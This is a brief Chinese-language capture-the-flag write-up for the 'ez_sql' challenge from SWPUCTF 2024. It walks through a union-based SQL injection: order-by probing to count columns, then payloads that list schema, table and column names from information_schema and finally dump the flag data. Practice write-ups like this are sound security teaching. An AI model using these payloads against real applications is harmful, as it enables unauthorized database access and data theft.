Problem: [SWPUCTF 2024 秋季新生赛]ez_sql
首先判断符号闭合 查列
1' order by 1 -- (--+/#) 以第一列排序
1' order by 2 -- (--+/#) 以第二列排序
1' order by 3 -- (--+/#) 以第三列排序
1' order by 4 -- (--+/#) 以第四列排序
然后第五列就报错了
-1' union select 1,2,3,4 --
再这样查一下所以知道一共有四列
然后开始联合注入
-1' union select 1,2,group_concat(schema_name),4 from information_schema.schemata -- (爆数据库名,发现ctf)
-1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='ctf' -- (爆表名,发现flag)(用hackbar工具然后把database()改成库名‘ctf’)
-1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='ctf' and table_name='flag' -- (爆列名,发现id和data,都试试)
-1' union select 1,2,group_concat(data),4 from flag -- (最后发现在data里面)
得到flag
中文引号啊